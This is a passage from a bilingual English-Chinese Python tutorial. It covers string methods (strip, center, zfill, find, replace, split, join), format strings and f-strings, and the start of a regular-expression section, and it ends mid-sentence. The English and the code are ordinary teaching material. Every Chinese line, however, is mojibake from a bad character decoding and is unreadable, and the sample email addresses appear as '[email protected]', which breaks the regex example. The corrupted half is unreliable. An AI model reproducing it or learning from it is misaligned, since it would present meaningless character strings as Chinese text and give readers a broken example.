### ๆ ผๅผๅๅญ็ฌฆไธฒ๏ผๅขๅ ๅๅป้ค็ฉบๆ ผ
> Another common need is to remove spaces (or other characters) from the beginning or end of the string.
The basic method of removing characters is the ``strip()`` method, which strips whitespace from the beginning and end of the line:
ๅฆๅคไธไธชๅธธ่ง็้ๆฑๆฏๅจๅญ็ฌฆไธฒๅผๅคดๆ็ปๆไธบๆญขๅป้ค็ฉบๆ ผ๏ผๆ่
ๅ
ถไปๅญ็ฌฆ๏ผใ`strip()`ๆนๆณๅฏไปฅๅป้คๅผๅคดๅ็ปๅฐพ็็ฉบ็ฝใ
```
line = ' this is the content '
line.strip()
```
> To remove just space to the right or left, use ``rstrip()`` or ``lstrip()`` respectively:
ๅฆๆ้่ฆๅป้คๅณ่พนๆ่
ๅทฆ่พน็็ฉบๆ ผ๏ผๅฏไปฅไฝฟ็จ`rstrip()`ๆ`lstrip()`ๆนๆณ๏ผ
```
line.rstrip()
line.lstrip()
```
> To remove characters other than spaces, you can pass the desired character to the ``strip()`` method:
ๆณ่ฆๅป้ค้็ฉบๆ ผ็ๅ
ถไปๅญ็ฌฆ๏ผไฝ ๅฏไปฅๅฐไฝ ๆณ่ฆๅป้ค็ๅญ็ฌฆไฝไธบๅๆฐไผ ็ป`strip()`ๆนๆณ๏ผ
```
num = "000000000000435"
num.strip('0')
```
> The opposite of this operation, adding spaces or other characters, can be accomplished using the ``center()``, ``ljust()``, and ``rjust()`` methods.
ไธstrip็ธๅ็ๆไฝ๏ผๅพๅญ็ฌฆไธฒไธญๅ ๅ
ฅ็ฉบๆ ผๆๅ
ถไปๅญ็ฌฆ๏ผๅฏไปฅไฝฟ็จ`center()`๏ผ`ljust()`๏ผ`rjust()`ๆนๆณใ
> For example, we can use the ``center()`` method to center a given string within a given number of spaces:
ไพๅฆ๏ผๆไปฌๅฏไปฅไฝฟ็จ`center()`ๆนๆณๅจ็ปๅฎ้ฟๅบฆ็็ฉบๆ ผไธญๅฑ
ไธญ๏ผ
```
line = "this is the content"
line.center(30)
```
> Similarly, ``ljust()`` and ``rjust()`` will left-justify or right-justify the string within spaces of a given length:
ๅ็๏ผ`ljust()`ๅ`rjust()`่ฎฉๅญ็ฌฆไธฒๅจ็ปๅฎ้ฟๅบฆ็็ฉบๆ ผไธญๅฑ
ๅทฆๆๅฑ
ๅณ๏ผ
```
line.ljust(30)
line.rjust(30)
```
> All these methods additionally accept any character which will be used to fill the space.
For example:
ไธ่ฟฐ็ๆนๆณ้ฝๅฏไปฅๆฅๆถไธไธช้ขๅค็ๅๆฐ็จๆฅๅไปฃ็ฉบ็ฝๅญ็ฌฆ๏ผไพๅฆ๏ผ
```
'435'.rjust(10, '0')
```
> Because zero-filling is such a common need, Python also provides ``zfill()``, which is a special method to right-pad a string with zeros:
ๅ ไธบ0ๅกซๅ
ไน็ปๅธธ้่ฆ็จๅฐ๏ผๅ ๆญคPythonๆไพไบ`zfill()`ๆนๆณๆฅ็ดๆฅๆไพ0ๅกซๅ
็ๅ่ฝ๏ผ
```
'435'.zfill(10)
```
### Finding and replacing substrings
### ๆฅๆพๅๆฟๆขๅญไธฒ
> If you want to find occurrences of a certain character in a string, the ``find()``/``rfind()``, ``index()``/``rindex()``, and ``replace()`` methods are the best built-in methods.
ๅฆๆไฝ ๆณ่ฆๅจๅญ็ฌฆไธฒไธญๆฅๆพ็นๅฎ็ๅญไธฒ๏ผๅ
งๅปบ็`find()`/`rfind()`๏ผ`index()`/`rindex()`ไปฅๅ`replace()`ๆนๆณๆฏๆๅ้็้ๆฉใ
> ``find()`` and ``index()`` are very similar, in that they search for the first occurrence of a character or substring within a string, and return the index of the substring:
`find()`ๅ`index()`ๆฏ้ๅธธ็ธไผผ็๏ผๅฎไปฌ้ฝๆฏๆฅๆพๅญไธฒๅจๅญ็ฌฆไธฒไธญ็ฌฌไธไธชๅบ็ฐ็ไฝ็ฝฎ๏ผ่ฟๅไฝ็ฝฎ็ๅบๅทๅผ๏ผ
```
line = 'the quick brown fox jumped over a lazy dog'
line.find('fox')
line.index('fox')
```
> The only difference between ``find()`` and ``index()`` is their behavior when the search string is not found; ``find()`` returns ``-1``, while ``index()`` raises a ``ValueError``:
ไธคไธชๆนๆณๅฏไธ็ๅบๅซๅจไบๅฆๆๆพไธๅฐๅญไธฒๆ
ๅตไธ็ๅค็ๆนๅผ๏ผ`find()`ไผ่ฟๅ-1๏ผ่`index()`ไผ็ๆไธไธช`ValueError`ๅผๅธธ๏ผ
```
line.find('bear')
line.index('bear')
```
> The related ``rfind()`` and ``rindex()`` work similarly, except they search for the first occurrence from the end rather than the beginning of the string:
็ธๅบ็`rfind()`ๅ`rindex()`ๆนๆณๅพ็ฑปไผผ๏ผๅบๅซๆฏ่ฟไธคไธชๆนๆณๆฅๆพ็ๆฏๅญไธฒๅจๅญ็ฌฆไธฒไธญๆๅๅบ็ฐ็ไฝ็ฝฎใ
```
line.rfind('a')
```
> For the special case of checking for a substring at the beginning or end of a string, Python provides the ``startswith()`` and ``endswith()`` methods:
ๅฏนไบ้่ฆๆฃๆฅๅญ็ฌฆไธฒๆฏๅฆไปฅๆไธชๅญไธฒๅผๅงๆ่
็ปๆ๏ผPythonๆไพไบ`startswith()`ๅ`endswith()`ๆนๆณ๏ผ
```
line.endswith('dog')
line.startswith('fox')
```
> To go one step further and replace a given substring with a new string, you can use the ``replace()`` method.
Here, let's replace ``'brown'`` with ``'red'``:
่ฆๅฐๅญ็ฌฆไธฒไธญ็ๆไธชๅญไธฒๆฟๆขๆๆฐ็ๅญไธฒ็ๅ
ๅฎน๏ผๅฏไปฅไฝฟ็จ`replace()`ๆนๆณใไธไพไธญๅฐ`'brown'`ๆฟๆขๆ`'red'`๏ผ
```
line.replace('brown', 'red')
```
> The ``replace()`` function returns a new string, and will replace all occurrences of the input:
`replace()`ๆนๆณไผ่ฟๅไธไธชๆฐ็ๅญ็ฌฆไธฒ๏ผๅนถๅฐ้้ขๆๆๆพๅฐ็ๅญไธฒๆฟๆข๏ผ
```
line.replace('o', '--')
```
> For a more flexible approach to this ``replace()`` functionality, see the discussion of regular expressions in [Flexible Pattern Matching with Regular Expressions](#Flexible-Pattern-Matching-with-Regular-Expressions).
ๆณ่ฆๆดๅ ็ตๆดป็ไฝฟ็จ`replace()`ๆนๆณ๏ผๅ่ง[ไฝฟ็จๆญฃๅ่กจ่พพๅผ่ฟ่กๆจกๅผๅน้
](#Flexible-Pattern-Matching-with-Regular-Expressions)ใ
### Splitting and partitioning strings
### ๅๅฒๅญ็ฌฆไธฒ
> If you would like to find a substring *and then* split the string based on its location, the ``partition()`` and/or ``split()`` methods are what you're looking for.
Both will return a sequence of substrings.
ๅฆๆ้่ฆๆฅๆพไธไธชๅญไธฒ*ๅนถไธ*ๆ นๆฎๆพๅฐ็ๅญไธฒ็ไฝ็ฝฎๅฐๅญ็ฌฆไธฒ่ฟ่กๅๅฒ๏ผ`partition()`ๅ/ๆ`split()`ๆนๆณๆญฃๆฏไฝ ๆณ่ฆ็ใ
> The ``partition()`` method returns a tuple with three elements: the substring before the first instance of the split-point, the split-point itself, and the substring after:
`partition()`ๆนๆณ่ฟๅไธไธชๅ
็ด ็ไธไธชๅ
็ป๏ผๆฅๆพ็ๅญไธฒๅ้ข็ๅญไธฒ๏ผๆฅๆพ็ๅญไธฒๆฌ่บซๅๆฅๆพ็ๅญไธฒๅ้ข็ๅญไธฒ๏ผ
```
line.partition('fox')
```
> The ``rpartition()`` method is similar, but searches from the right of the string.
`rpartition()`ๆนๆณ็ฑปไผผ๏ผไธ่ฟๆฏไปๅญ็ฌฆไธฒๅณ่พนๅผๅงๆฅๆพใ
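Since the text doesn't show it in action, here is a small illustrative call (an addition, using the same `line` as before):
```
line = 'the quick brown fox jumped over a lazy dog'
line.rpartition('o')   # splits around the *last* 'o' (the one in "dog")
```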
> The ``split()`` method is perhaps more useful; it finds *all* instances of the split-point and returns the substrings in between.
The default is to split on any whitespace, returning a list of the individual words in a string:
`split()`ๆนๆณๅฏ่ฝๆดๅ ๆ็จ๏ผๅฎไผๆฅๆพๆๆๅญไธฒๅบ็ฐ็ไฝ็ฝฎ๏ผ็ถๅ่ฟๅ่ฟไบไฝ็ฝฎไน้ด็ๅ
ๅฎนๅ่กจใ้ป่ฎค็ๅญไธฒไผๆฏไปปไฝ็็ฉบ็ฝๅญ็ฌฆ๏ผ่ฟๅๅญ็ฌฆไธฒไธญๆๆ็ๅ่ฏ๏ผ
```
line.split()
```
> A related method is ``splitlines()``, which splits on newline characters.
Let's do this with a Haiku, popularly attributed to the 17th-century poet Matsuo Bashō:
่ฟๆไธไธช`splitlines()`ๆนๆณ๏ผไผๆ็
งๆข่ก็ฌฆๅๅฒๅญ็ฌฆไธฒใๆไปฌไปฅๆฅๆฌ17ไธ็บช่ฏไบบๆพๅฐพ่ญ่็ไฟณๅฅไธบไพ๏ผ
```
haiku = """matsushima-ya
aah matsushima-ya
matsushima-ya"""
haiku.splitlines()
```
> Note that if you would like to undo a ``split()``, you can use the ``join()`` method, which returns a string built from a splitpoint and an iterable:
ๅฆๆไฝ ้่ฆๆค้`split()`ๆนๆณ๏ผๅฏไปฅไฝฟ็จ`join()`ๆนๆณ๏ผไฝฟ็จไธไธช็นๅฎๅญ็ฌฆไธฒๅฐไธไธช่ฟญไปฃๅจไธฒ่่ตทๆฅ๏ผ
```
'--'.join(['1', '2', '3'])
```
> A common pattern is to use the special character ``"\n"`` (newline) to join together lines that have been previously split, and recover the input:
ไฝฟ็จๆข่ก็ฌฆ`"\n"`ๅฐๅๆๆๅผ็่ฏๅฅ่ฟ่ตทๆฅ๏ผๆขๅคๆๅๆฅ็ๅญ็ฌฆไธฒ๏ผ
```
print("\n".join(['matsushima-ya', 'aah matsushima-ya', 'matsushima-ya']))
```
## Format Strings
## ๆ ผๅผๅๅญ็ฌฆไธฒ
> In the preceding methods, we have learned how to extract values from strings, and to manipulate strings themselves into desired formats.
Another use of string methods is to manipulate string *representations* of values of other types.
Of course, string representations can always be found using the ``str()`` function; for example:
ๅจๅ้ขไป็ป็ๆนๆณไธญ๏ผๆไปฌๅญฆไน ๅฐไบๆๆ ทไปๅญ็ฌฆไธฒไธญๆๅๅผๅๅฆๆๅฐๅญ็ฌฆไธฒๆฌ่บซๆไฝๆ้่ฆ็ๆ ผๅผใๅฏนไบๅญ็ฌฆไธฒๆฅ่ฏด๏ผ่ฟๆไธไธช้่ฆ็้ๆฑ๏ผๅฐฑๆฏๅฐๅ
ถไป็ฑปๅ็ๅผไฝฟ็จๅญ็ฌฆไธฒ*่กจ่พพๅบๆฅ*ใๅฝ็ถ๏ผไฝ ๆปๆฏๅฏไปฅไฝฟ็จ`str()`ๅฝๆฐๅฐๅ
ถไป็ฑปๅ็ๅผ่ฝฌๆขไธบๅญ็ฌฆไธฒ๏ผไพๅฆ๏ผ
```
pi = 3.14159
str(pi)
```
> For more complicated formats, you might be tempted to use string arithmetic as outlined in [Basic Python Semantics: Operators](04-Semantics-Operators.ipynb):
ๅฏนไบๆดๅ ๅคๆ็ๆ ผๅผ๏ผไฝ ๅฏ่ฝ่ฏๅพไฝฟ็จๅจ[Python่ฏญๆณ: ๆไฝ็ฌฆ](04-Semantics-Operators.ipynb)ไป็ป่ฟ็ๅญ็ฌฆไธฒ่ฟ็ฎๆฅๅฎ็ฐ๏ผ
```
"The value of pi is " + str(pi)
```
> A more flexible way to do this is to use *format strings*, which are strings with special markers (noted by curly braces) into which string-formatted values will be inserted.
Here is a basic example:
ไฝๆฏๆไปฌๅไธไธชๆด็ตๆดป็ๆนๅผๆฅๅค็ๆ ผๅผๅ๏ผ้ฃๅฐฑๆฏไฝฟ็จ*ๆ ผๅผๅๅญ็ฌฆไธฒ*๏ผไนๅฐฑๆฏๅจๅญ็ฌฆไธฒไธญๅซๆ็นๆฎ็ๆ ่ฎฐไปฃ่กจๆ ผๅผ๏ผ่ฟไธช็นๆฎๆ ่ฎฐๆ็ๆฏ่ฑๆฌๅท๏ผ๏ผ็ถๅๅฐ้่ฆ่กจ่พพ็ๅผๆๅ
ฅๅฐๅญ็ฌฆไธฒ็็ธๅบไฝ็ฝฎไธใไพๅฆ๏ผ
```
"The value of pi is {}".format(pi)
```
> Inside the ``{}`` marker you can also include information on exactly *what* you would like to appear there.
If you include a number, it will refer to the index of the argument to insert:
ๅจ่ฑๆฌๅท`{}`ไน้ด๏ผไฝ ๅฏไปฅๅ ๅ
ฅ้่ฆ็ไฟกๆฏใไพๅฆไฝ ๅฏไปฅๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๆฐๅญ๏ผ่กจ็คบ่ฏฅไฝ็ฝฎๆๅ
ฅ็ๅๆฐ็ๅบๅท๏ผ
```
"""First letter: {0}. Last letter: {1}.""".format('A', 'Z')
```
> If you include a string, it will refer to the key of any keyword argument:
ๅฆๆไฝ ๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๅญ็ฌฆไธฒ๏ผ่กจ็คบ็ๆฏ่ฏฅไฝ็ฝฎๆๅ
ฅ็ๅ
ณ้ฎๅญๅๆฐ็ๅ็งฐ๏ผ
```
"""First letter: {first}. Last letter: {last}.""".format(last='Z', first='A')
```
> Finally, for numerical inputs, you can include format codes which control how the value is converted to a string.
For example, to print a number as a floating point with three digits after the decimal point, you can use the following:
ๆๅ๏ผๅฏนไบๆฐๅญ่พๅ
ฅ๏ผไฝ ๅฏไปฅๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๆ ผๅผๅ็ไปฃ็ ๆงๅถๆฐๅผ่ฝฌๆขไธบๅญ็ฌฆไธฒ็ๆ ผๅผใไพๅฆ๏ผๅฐไธไธชๆตฎ็นๆฐ่ฝฌๆขไธบๅญ็ฌฆไธฒ๏ผๅนถไธไฟ็ๅฐๆฐ็นๅ3ไฝ๏ผๅฏไปฅ่ฟๆ ทๅ๏ผ
```
"pi = {0:.3f}".format(pi)
```
> As before, here the "``0``" refers to the index of the value to be inserted.
The "``:``" marks that format codes will follow.
The "``.3f``" encodes the desired precision: three digits beyond the decimal point, floating-point format.
ๅฆๅๆ่ฟฐ๏ผ`"0"`่กจ็คบๅๆฐไฝ็ฝฎๅบๅทใ`":"`่กจ็คบๆ ผๅผๅไปฃ็ ๅ้็ฌฆใ`".3f"`่กจ็คบๆตฎ็นๆฐๆ ผๅผๅ็ไปฃ็ ๏ผๅฐๆฐ็นๅไฟ็3ไฝใ
> This style of format specification is very flexible, and the examples here barely scratch the surface of the formatting options available.
For more information on the syntax of these format strings, see the [Format Specification](https://docs.python.org/3/library/string.html#formatspec) section of Python's online documentation.
่ฟๆ ท็ๆ ผๅผๅฎไน้ๅธธ็ตๆดป๏ผๆไปฌ่ฟ้็ไพๅญไป
ไป
ๆฏไธไธช็ฎๅ็ไป็ปใๆณ่ฆๆฅ้
ๆดๅคๆๅ
ณๆ ผๅผๅๅญ็ฌฆไธฒ็่ฏญๆณๅ
ๅฎน๏ผ่ฏทๅ่งPythonๅจ็บฟๆๆกฃๆๅ
ณ[ๆ ผๅผๅๅฎไน](https://docs.python.org/3/library/string.html#formatspec)็็ซ ่ใ
## f-strings (translator's addition)
Since Python 3.6 there is another flexible and efficient way to format strings, called the *f-string*, which lets you insert variable values directly into the format string.
Revisiting the `pi` example from above:
```
f"The value of pi is {pi}"
```
An f-string is written by prefixing the format string with `f`; the braces then contain the variable names themselves. For example:
```
first = 'A'
last = 'Z'
f"First letter: {first}. Last letter: {last}."
```
Numeric formatting works the same way: simply place a `":"` after the variable name to separate it from the format code, as in the earlier floating-point example:
```
f"pi = {pi:.3f}"
```
## Flexible Pattern Matching with Regular Expressions
## ไฝฟ็จๆญฃๅ่กจ่พพๅผๅฎ็ฐๆจกๅผๅน้
> The methods of Python's ``str`` type give you a powerful set of tools for formatting, splitting, and manipulating string data.
But even more powerful tools are available in Python's built-in *regular expression* module.
Regular expressions are a huge topic; there are entire books written on the subject (including Jeffrey E.F. Friedl's [*Mastering Regular Expressions, 3rd Edition*](http://shop.oreilly.com/product/9780596528126.do)), so it will be hard to do it justice within just a single subsection.
Python็`str`็ฑปๅ็ๅ
งๅปบๆนๆณๆไพไบไธๆดๅฅๅผบๅคง็ๆ ผๅผๅใๅๅฒๅๆไฝๅญ็ฌฆไธฒ็ๅทฅๅ
ทใPythonๅ
งๅปบ็*ๆญฃๅ่กจ่พพๅผ*ๆจกๅๆไพไบๆดไธบๅผบๅคง็ๅญ็ฌฆไธฒๆไฝๅทฅๅ
ทใๆญฃๅ่กจ่พพๅผๆฏไธไธชๅทจๅคง็่ฏพ้ข๏ผๅจ่ฟไธช่ฏพ้ขไธๅฏไปฅๅไธๆฌไนฆๆฅ่ฏฆ็ปไป็ป๏ผๅ
ๆฌJeffrey E.F. Friedlๅ็[*Mastering Regular Expressions, 3rd Edition*](http://shop.oreilly.com/product/9780596528126.do)๏ผ๏ผๆไปฅๆๆๅจไธไธชๅฐ่ไธญไป็ปๅฎๅฎๆฏไธ็ฐๅฎ็ใ
> My goal here is to give you an idea of the types of problems that might be addressed using regular expressions, as well as a basic idea of how to use them in Python.
I'll suggest some references for learning more in [Further Resources on Regular Expressions](#Further-Resources-on-Regular-Expressions).
ไฝ่
ๆๆ้่ฟ่ฟไธชๅฐ่็ไป็ป๏ผ่ฝๅค่ฎฉ่ฏป่
ๅฏนไบไปไนๆ
ๅตไธ้่ฆไฝฟ็จๆญฃๅ่กจ่พพๅผไปฅๅๅจPythonไธญๆๅบๆฌ็ๆญฃๅ่กจ่พพๅผไฝฟ็จๆนๆณๆๅๆญฅ็ไบ่งฃใไฝ่
ๅปบ่ฎฎๅจ[ๆดๅค็ๆญฃๅ่กจ่พพๅผ่ตๆบ](#Further-Resources-on-Regular-Expressions)ไธญ่ฟไธๆญฅๆๅฑ้
่ฏปๅๅญฆไน ใ
> Fundamentally, regular expressions are a means of *flexible pattern matching* in strings.
If you frequently use the command-line, you are probably familiar with this type of flexible matching with the "``*``" character, which acts as a wildcard.
For example, we can list all the IPython notebooks (i.e., files with extension *.ipynb*) with "Python" in their filename by using the "``*``" wildcard to match any characters in between:
ไปๆๅบ็กไธๆฅ่ฏด๏ผๆญฃๅ่กจ่พพๅผๅ
ถๅฎๅฐฑๆฏไธ็งๅจๅญ็ฌฆไธฒไธญ่ฟ่ก*็ตๆดปๆจกๅผๅน้
*็ๆนๆณใๅฆๆไฝ ็ปๅธธไฝฟ็จๅฝไปค่ก๏ผไฝ ๅฏ่ฝๅทฒ็ปไน ๆฏไบ่ฟ็ง็ตๆดปๅน้
ๆบๅถ๏ผๆฏๆน่ฏด`"*"`ๅท๏ผๅฐฑๆฏไธไธชๅ
ธๅ็้้
็ฌฆใๆไปฌๆฅ็ไธไธชไพๅญ๏ผๆไปฌๅฏไปฅๅ็คบๆๆ็IPython notebook๏ผๆฉๅฑๅไธบ*.ipynb*๏ผ๏ผ็ถๅๆไปถๅไธญๅซๆ"Python"็ๆไปถๅ่กจใ
```
!ls *Python*.ipynb
```
> Regular expressions generalize this "wildcard" idea to a wide range of flexible string-matching syntaxes.
The Python interface to regular expressions is contained in the built-in ``re`` module; as a simple example, let's use it to duplicate the functionality of the string ``split()`` method:
ๆญฃๅ่กจ่พพๅผๅฐฑๆฏไธ็งๆณๅไบ็"้้
็ฌฆ"๏ผไฝฟ็จๆ ๅ็่ฏญๆณๅฏนๅญ็ฌฆไธฒ่ฟ่กๆจกๅผๅน้
ใPythonไธญ็ๆญฃๅ่กจ่พพๅผๅ่ฝๅ
ๅซๅจ`re`ๅ
งๅปบๆจกๅ๏ผไฝไธบไธไธช็ฎๅ็ไพๅญ๏ผๆไปฌไฝฟ็จ`re`้้ข็`split()`ๆนๆณๆฅๅฎ็ฐๅญ็ฌฆไธฒ`str`็ๅญ็ฌฆไธฒๅๅฒๅ่ฝ๏ผ
```
import re
regex = re.compile('\s+')
regex.split(line)
```
> Here we've first *compiled* a regular expression, then used it to *split* a string.
Just as Python's ``split()`` method returns a list of all substrings between whitespace, the regular expression ``split()`` method returns a list of all substrings between matches to the input pattern.
ๆฌไพไธญ๏ผๆไปฌ้ฆๅ
*็ผ่ฏไบ*ไธไธชๆญฃๅ่กจ่พพๅผ๏ผ็ถๅๆไปฌ็จ่ฟไธช่กจ่พพๅผๅฏนๅญ็ฌฆไธฒ่ฟ่ก*ๅๅฒ*ใๅฐฑๅ`str`็`split()`ๆนๆณไผไฝฟ็จ็ฉบ็ฝๅญ็ฌฆๅๅฒๅญ็ฌฆไธฒไธๆ ท๏ผๆญฃๅ่กจ่พพๅผ็`split()`ๆนๆณไนไผ่ฟๅๆๆๅน้
่พๅ
ฅ็ๆจกๅผ็ๅญ็ฌฆไธฒๅๅฒๅบๆฅ็ๅญ็ฌฆไธฒๅ่กจใ
> In this case, the input is ``"\s+"``: "``\s``" is a special character that matches any whitespace (space, tab, newline, etc.), and the "``+``" is a character that indicates *one or more* of the entity preceding it.
Thus, the regular expression matches any substring consisting of one or more spaces.
ๅจ่ฟไธชไพๅญ้๏ผ่พๅ
ฅ็ๆจกๅผๆฏ`"\s+"`๏ผ`"\s"`ๆฏๆญฃๅ่กจ่พพๅผ้้ข็ไธไธช็นๆฎ็ๅญ็ฌฆ๏ผไปฃ่กจ็ไปปไฝ็ฉบ็ฝๅญ็ฌฆ๏ผ็ฉบๆ ผ๏ผๅถ่กจ็ฌฆ๏ผๆข่ก็ญ๏ผ๏ผ`"+"`ๅทไปฃ่กจๅ้ขๅน้
ๅฐ็ๅญ็ฌฆๅบ็ฐไบ*ไธๆฌกๆๅคๆฌก*ใๅ ๆญค๏ผ่ฟไธชๆญฃๅ่กจ่พพๅผ็ๆๆๆฏๅน้
ไปปไฝไธไธชๆๅคไธช็็ฉบ็ฝ็ฌฆๅทใ
> The ``split()`` method here is basically a convenience routine built upon this *pattern matching* behavior; more fundamental is the ``match()`` method, which will tell you whether the beginning of a string matches the pattern:
่ฟ้็`split()`ๆนๆณๆฏไธไธชๅจ*ๆจกๅผๅน้
*ไนไธ็ๅญ็ฌฆไธฒๅๅฒๆนๆณ๏ผๅฏนไบๆญฃๅ่กจ่พพๅผๆฅ่ฏด๏ผๆดๅ ๅบ็ก็ๅฏ่ฝๆฏ`match()`ๆนๆณ๏ผๅฎไผ่ฟๅๅญ็ฌฆไธฒๆฏๅฆๆๅๅน้
ๅฐไบๆ็งๆจกๅผ๏ผ
```
for s in [" ", "abc ", " abc"]:
if regex.match(s):
print(repr(s), "matches")
else:
print(repr(s), "does not match")
```
> Like ``split()``, there are similar convenience routines to find the first match (like ``str.index()`` or ``str.find()``) or to find and replace (like ``str.replace()``).
We'll again use the line from before:
ๅฐฑๅ`split()`๏ผๆญฃๅ่กจ่พพๅผไธญไนๆ็ธๅบ็ๆนๆณ่ฝๅคๆพๅฐ้ฆไธชๅน้
ไฝ็ฝฎ๏ผๅฐฑๅ`str.index()`ๆ่
`str.find()`ไธๆ ท๏ผๆ่
ๆฏๆฅๆพๅๆฟๆข๏ผๅฐฑๅ`str.replace()`๏ผใๆไปฌ่ฟๆฏไปฅๅ้ข็้ฃ่กๅญ็ฌฆไธฒไธบไพ๏ผ
```
line = 'the quick brown fox jumped over a lazy dog'
```
> With this, we can see that the ``regex.search()`` method operates a lot like ``str.index()`` or ``str.find()``:
ๅฏไปฅไฝฟ็จ`regex.search()`ๆนๆณๅ`str.index()`ๆ่
`str.find()`้ฃๆ ทๆฅๆพๆจกๅผไฝ็ฝฎ๏ผ
```
line.index('fox')
regex = re.compile('fox')
match = regex.search(line)
match.start()
```
> Similarly, the ``regex.sub()`` method operates much like ``str.replace()``:
็ฑปไผผ็๏ผ`regex.sub()`ๆนๆณๅฐฑๅ`str.replace()`้ฃๆ ทๆฟๆขๅญ็ฌฆไธฒ๏ผ
```
line.replace('fox', 'BEAR')
regex.sub('BEAR', line)
```
> With a bit of thought, other native string operations can also be cast as regular expressions.
ๅ
ถไป็ๅๅงๅญ็ฌฆไธฒๆไฝไนๅฏไปฅ่ฝฌๆขไธบๆญฃๅ่กจ่พพๅผๆไฝใ
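For instance (an illustrative sketch, not from the original text), the `startswith()` and `endswith()` checks from earlier can be mimicked by anchoring a pattern:
```
import re
line = 'the quick brown fox jumped over a lazy dog'
bool(re.match('the', line))     # roughly equivalent to line.startswith('the')
bool(re.search('dog$', line))   # roughly equivalent to line.endswith('dog')
```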
### A more sophisticated example
### ไธไธชๆดๅ ๅคๆ็ไพๅญ
> But, you might ask, why would you want to use the more complicated and verbose syntax of regular expressions rather than the more intuitive and simple string methods?
The advantage is that regular expressions offer *far* more flexibility.
ไบๆฏ๏ผไฝ ๅฐฑไผ้ฎ๏ผๆข็ถๅฆๆญค๏ผไธบไปไนๆไปฌ่ฆ็จๅคๆ็ๆญฃๅ่กจ่พพๅผ็ๆนๆณ๏ผ่ไธ็จ็ฎๅ็ๅญ็ฌฆไธฒๆนๆณๅข๏ผๅๅ ๅฐฑๆฏๆญฃๅ่กจ่พพๅผๆไพไบๆดๅค็็ตๆดปๆงใ
> Here we'll consider a more complicated example: the common task of matching email addresses.
I'll start by simply writing a (somewhat indecipherable) regular expression, and then walk through what is going on.
Here it goes:
ไธ้ขๆไปฌๆฅ่่ไธไธชๆดๅ ๅคๆ็ไพๅญ๏ผๅน้
็ตๅญ้ฎไปถๅฐๅใไฝ่
ไผไฝฟ็จไธไธช็ฎๅ็๏ผไฝๅ้พไปฅ็่งฃ็๏ผๆญฃๅ่กจ่พพๅผ๏ผ็ถๅๆไปฌ็็่ฟไธช่ฟ็จไธญๅ็ไบไปไนใๅฆไธ๏ผ
```
email = re.compile('\w+@\w+\.[a-z]{3}')
```
> Using this, if we're given a line from a document, we can quickly extract things that look like email addresses
ไฝฟ็จ่ฟไธชๆญฃๅ่กจ่พพๅผ๏ผๆไปฌๅฏไปฅๅพๅฟซๅฐๅจไธ่กๆๆฌไธญๆๅๅบๆฅๆๆ็็ตๅญ้ฎไปถๅฐๅ๏ผ
```
text = "To email Guido, try [email protected] or the older address [email protected]."
email.findall(text)
```
> (Note that these addresses are entirely made up; there are probably better ways to get in touch with Guido).
๏ผ่ฏทๆณจๆ่ฟไธคไธชๅฐๅ้ฝๆฏ็ผๆฐ็๏ผ่ฏๅฎๆๆดๅฅฝ็ๆนๅผ่ฝๅค่็ณปไธGuido๏ผ่ฏ่
ๆณจ๏ผGuidoๆฏPython็ๅๅงไบบ๏ผใ
> We can do further operations, like replacing these email addresses with another string, perhaps to hide addresses in the output:
ๆไปฌๅฏไปฅๅๆดๅค็ๅค็๏ผๆฏๆน่ฏดๅฐ็ตๅญ้ฎไปถๅฐๅๆฟๆขๆๅฆไธไธชๅญ็ฌฆไธฒ๏ผๆญคๅคๅไบไธไธช่ฑๆๅค็๏ผ
```
email.sub('[email protected]', text)
```
> Finally, note that if you really want to match *any* email address, the preceding regular expression is far too simple.
For example, it only allows addresses made of alphanumeric characters that end in one of several common domain suffixes.
So, for example, the period used here means that we only find part of the address:
ๆๅ๏ผๅฆๆไฝ ้่ฆๅน้
*ไปปไฝ*็็ตๅญ้ฎไปถๅฐๅ๏ผ้ฃไนไธ้ข็ๆญฃๅ่กจ่พพๅผ่ฟ่ฟ่ฟไธๅคใๅฎๅชๅ
่ฎธๅฐๅ็ฑๅญๆฏๆฐๅญ็ปๆๅนถไธไธ็บงๅๅไป
่ฝๆฏๆๅฐๆฐ็้็จๅๅใๅ ไธบไธ้ข็ๅฐๅๅซๆ็น`.`๏ผๅ ๆญคๅช่ฝๅน้
ๅฐไธ้จๅ็็ตๅญ้ฎไปถๅฐๅใ
```
email.findall('[email protected]')
```
> This goes to show how unforgiving regular expressions can be if you're not careful!
If you search around online, you can find some suggestions for regular expressions that will match *all* valid emails, but beware: they are much more involved than the simple expression used here!
่ฟ่กจๆไบๅฆๆไฝ ไธๅฐๅฟ็่ฏ๏ผๆญฃๅ่กจ่พพๅผไผๅ็ๅคๅฅๆช็้่ฏฏใๅฆๆไฝ ๅจ็ฝไธๆ็ดข็่ฏ๏ผไฝ ๅฏไปฅๅ็ฐไธไบ่ฝๅคๅน้
*ๆๆ*็็ตๅญ้ฎไปถๅฐๅ็ๆญฃๅ่กจ่พพๅผ๏ผไฝๆฏ๏ผๅฎไปฌๆฏๆไปฌ่ฟไธช็ฎๅ็็ๆฌ้พ็่งฃๅคไบใ
### Basics of regular expression syntax
### ๆญฃๅ่กจ่พพๅผๅบๆฌ่ฏญๆณ
> The syntax of regular expressions is much too large a topic for this short section.
Still, a bit of familiarity can go a long way: I will walk through some of the basic constructs here, and then list some more complete resources from which you can learn more.
My hope is that the following quick primer will enable you to use these resources effectively.
ๆญฃๅ่กจ่พพๅผ็่ฏญๆณๅฏนไบ่ฟไธชๅฐ่็ๅ
ๅฎนๆฅ่ฏดๆพๅพๅคชๅบๅคงไบใ็ถ่๏ผไบ่งฃไธไบๅบ็ก็ๅ
ๅฎน่ฝๅค่ฎฉ่ฏป่
่ตฐ็ๆด่ฟ๏ผไฝ่
ไผๅจ่ฟ้็ฎๅไป็ปไธไบๆๅบๆฌ็็ปๆ๏ผ็ถๅๅๅบไธไธชๅฎๆด็่ตๆบไปฅไพ่ฏป่
็ปง็ปญๆทฑๅ
ฅ็ ็ฉถๅๅญฆไน ใไฝ่
ๅธๆ้่ฟ่ฟไบ็ฎๅ็ๅบ็กๅ
ๅฎน่ฝ่ฎฉ่ฏป่
ๆดๅ ๆๆ็้
่ฏป้ฃไบ้ขๅค็่ตๆบใ
#### Simple strings are matched directly
#### ็ฎๅ็ๅญ็ฌฆไธฒไผ็ดๆฅๅน้
> If you build a regular expression on a simple string of characters or digits, it will match that exact string:
ๅฆๆไฝ ็ๆญฃๅ่กจ่พพๅผๅชๅ
